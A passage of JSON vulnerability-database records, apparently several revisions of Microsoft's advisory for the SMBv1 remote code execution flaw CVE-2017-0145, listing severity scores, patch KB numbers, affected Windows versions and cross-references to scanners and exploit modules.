"rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-30T06:48:04", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012212", "KB4012216", "KB4013198", "KB4012213", "KB4012217", "KB3177186", "KB4013429", "KB3210720", "KB3213986", "KB4012215", "KB3212646", "KB4012214", "KB3205409", "KB3205401", "KB3210721", "KB4012606", "KBMS16-110, 3187754", "KB4012598", "KB4014077"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T09:06:55", "differentElements": ["msAffectedSoftware"], "edition": 85}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-01T12:45:41", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-27752"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-10-01T12:45:41", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-10-01T12:45:41", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012213", "KB3205401", "KB4012214", "KB3177186", "KB3212646", "KBMS16-110, 3187754", "KB3210721", "KB4014077", "KB4012217", "KB4012212", "KB3210720", "KB3213986", "KB4012598", "KB4012215", "KB4013198", "KB3205409", "KB4012216", "KB4012606", "KB4013429"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-10-01T12:45:41", "differentElements": ["msAffectedSoftware", "vendorCvss"], "edition": 86}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "91abc99a545f1702db030dbb906d98de", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-10-04T22:46:36", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "mmpc", "idList": ["MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-27786"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-10-04T22:46:36", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-10-04T22:46:36", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205401", "KB4012215", "KB4012213", "KB4012606", "KB4012216", "KB4012598", "KB4013198", "KB3212646", "KB4013429", "KB3213986", "KB3210720", "KBMS16-110, 3187754", "KB3210721", "KB3177186", "KB3205409", "KB4014077", "KB4012212", "KB4012217", "KB4012214"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": 